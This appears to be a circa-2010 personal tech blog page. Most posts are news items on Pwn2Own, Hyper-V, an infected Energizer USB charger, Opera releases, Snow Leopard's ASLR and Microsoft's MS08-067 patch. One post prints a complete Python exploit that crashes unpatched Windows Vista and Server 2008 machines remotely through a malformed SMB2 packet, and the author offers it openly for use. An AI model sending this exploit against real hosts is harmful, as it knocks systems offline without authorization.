Pwn2Own 2010 News
-
Developing a new exploit takes a lot of work, however with enough time and talent anything can be hacked, even something fully patched.
-
In general, most criminals are simply too lazy or do not have the skills to develop such advanced exploits. But then again, they don't have to. The simple, well known exploits and vulnerabilities are working just fine.
-
The only organizations that would have to worry about such attacks are high-value targets. If you believe you are such a target, and that threats may target specifically you, contests like this demonstrate that no matter how much prevention you implement it can be bypassed. Detection and incident response are just as important as prevention.
Dynamic Memory Coming To Hyper-V
Jeff Woolsey: I’ve had the pleasure of talking with customers in the last few months and the Hyper-V R2 reception has been nothing but unequivocally positive. Whether it’s been folks in small, medium or the enterprise, they appreciate the new capabilities in Windows Server 2008 R2 Hyper-V and the free Microsoft Hyper-V Server 2008 R2. At the same time, we’re always listening to our customers to better understand their business requirements and requests so we know know what to build for subsequent releases. Today, we’re pleased to announce new capabilities that will enhance both virtualized server and virtualized desktop deployments:
Remote FX: With Microsoft RemoteFX, users will be able to work remotely in a Windows Aero desktop environment, watch full-motion video, enjoy Silverlight animations, and run 3D applications within a Hyper-V VM – all with the fidelity of a local-like performance. For more info, check out Max’s blog here.
Hyper-V Dynamic Memory: With Hyper-V Dynamic Memory, Hyper-V will enable greater virtual machine density suitable for servers and VDI deployments.
These are really nice new capabilities read more here
INFECTED HARDWARE !!
I received this interesting news today from my friend Lance. he said that he have read of several instances where hardware was infected but this is the first time he seen it officially reported in a CERT alert. The Energizer DUO, a USB-powered battery recharger was distributing malicious code that infected windows systems.
The hardware device itself does not infect the computer. Instead the infection happens from the software that comes with the device. Energizer is currently working with CERT to learn how their software was infected. In addition, only 9 out of 42 anti-virus products were able to detect the virus.
Lesson learned, it does not matter where you get the software from, scan it before installing it. Be sure your policies are enforcing this.
Technical details about this trojan can be found here
via: HoneyTech Security Update
Opera 10.5 Released… Go get it :)
The fastest brwoser on earth for windows platform has been released & you can download it from here.
Just a reminder of what's new in this release:
1- New Look
2- HTML 5 + CSS 3 support
3- Private browsing
4- Superfast JavaScript engine
5- Smother graphic rendering
6- Privet browsing
7- Fully integrated with windows 7 superbar
Opera 10.5 Beta 2 for Windows is OUT
- www.itechmax.com
Yesterday, Opera team released Opera 10.5 beta 2
no major changes only bug fixes as far as i can see
if anyone interested in detailed change log it can be found here.
Opera 10.5 Beta 1 Faster than Chrome 4
Benchmark Results by Betanews
Opera team released a new version of my favorite browser opera (Opera 10.5 beta 1). I really love the new GUI it's simple and beautiful. Yes, there is some similarity between the look & feel of opera 10.5 and Google chrome but to me opera looks more elegant.
The benchmarks that i saw today says that Opera 10.5 beta 1 is the fastest browser it's even faster than chrome v5 dev version. here is a short list of what's new in Opera 10.5 beta 1
1- Redesigned interface (much better than opera 10.1)
2- HTML 5 + CSS 3 support
3- Private browsing
4- Much Much faster JavaScript engine
5- Smother graphic rendering
You can download it and try it from here ( http://www.opera.com/browser/next/) just rememeber it's a beta version so don't expect it to be bug free. Currently, Opera 10.5 beta 1 only available for windows platform.
Side Note: Sorry for the podcast delay i'm really really sorry but i'm busy with projects that I'm comittieted to deliver on time so it's taking all my time for now the minute I have a space to breath I promise you that I will release the first episode of whatiknow podcast 
. Thank you for your understanding.
Charlie Miller: Snow Leopard is not as secure as Windows Vista/7
Snow Leopard lacks security features that are built in to Windows XP, Windows Vista and Windows 7, a noted Mac researcher has said. Dubbed ASLR, for address space layout randomization, the technology randomly assigns data to memory to make it tougher for attackers to determine the location of critical operating system functions, and thus make it harder for them to craft reliable exploits.
"Apple didn't change anything," said Charlie Miller, of Baltimore-based Independent Security Evaluators, the co-author of The Mac Hacker's Handbook, and winner of two consecutive "Pwn2own" hacker contests. "It's the exact same ASLR as in Leopard, which means it's not very good."
you can continue reading @ the source here Remote 0day Exploit for Vista, 2008 in the Wilde
There is a flaw in SMB2.0 which exists (I mean the SMBv2 itself not the vulnerability) in windows vista, 2008,7 and 2008 R2 but only Windows Vista & 2008 are vulnerable. If you exploited this flaw successfully you will crash & reboot any vista or 2008 remotely (of course only if SMB 445 port open ). Anyhow here is the exploit code it's written in python & I will assume that you know what to do with it
# SecurityReason Note :
# Tested on : Windows Vista SP2 full updated - US-en
#
#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" header field it
dies with a
# PAGE_FAULT_IN_NONPAGED_AREA B.S.O.D
from socket import socket
from time import sleep
host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> normal operation should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()
Microsoft: EMERGENCY Patch for Windows Today
على غير عاده مايكروسوفت (مايكروسوفت تصدر التحديثات كل ثلاثاء) راح تقوم باصدار تحديث اليوم لثغره خطيره جداا تم اكتشافها في نظام تشغيلها ويندوز ومن الممكن ان يتم استغلال هذه الثغره عن بعد ويعطي الهاكر كامل الصلاحيات على جهازك. وبناء على تصريح مايكروسوفت الثغره هذه موجوده بانظمه ويندوز من ويندوز 2000 الى ويندوز 2008 .. وتنصح مايكروسوفت بسرعه تثبيت التحديث بعد اصداره مباشره لحماية نظامك من الهاكرز
فا للاهميه جرى التنبيه
اضغط هنا لقراءه اعلان مايكروسوفت
تحديث الساعه 12:03 مساء
التحديث نزل من مايكروسوفت المفروض يجيكم عن طريق التحديث التلقائي للنظام واللي ماطلعت عنده يدخل على هاللنك ويحمل التحديث ويركبه MS08-067 المشكله في Server سرفس وتحديدا في مشكله في RPC Handling طبعا مستوى خطوره الثغره بانظمه اكس بي و 2000 و 2003 اعلى من فيستا و 2008.
Calendar
| S | S | M | T | W | T | F |
|---|---|---|---|---|---|---|
| « Aug | ||||||
| 1 | 2 | 3 | ||||
| 4 | 5 | 6 | 7 | 8 | 9 | 10 |
| 11 | 12 | 13 | 14 | 15 | 16 | 17 |
| 18 | 19 | 20 | 21 | 22 | 23 | 24 |
| 25 | 26 | 27 | 28 | 29 | 30 | |
Free Softwares
- Songbird 1.8.0
- Google Earth 5.2.1.1588
- uTorrent 2.2.0 Beta 21738
- KeePass 1.18
- GPU-Z 0.4.6
- Skype 5.0.0.123 Beta
- iTunes 10.0 (32-bit)
- Digsby Beta (build 82)
- ImgBurn 2.5.2.0
- Silverlight 4.0.50826